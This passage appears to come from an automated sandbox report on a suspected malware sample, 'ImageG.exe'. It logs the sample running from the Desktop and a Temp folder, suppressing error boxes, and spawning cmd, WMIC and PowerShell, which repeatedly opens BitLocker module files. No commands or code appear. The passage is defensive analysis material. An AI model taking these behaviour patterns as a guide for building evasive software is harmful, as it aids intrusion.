        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
        Source: C:\Users\user\Desktop\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
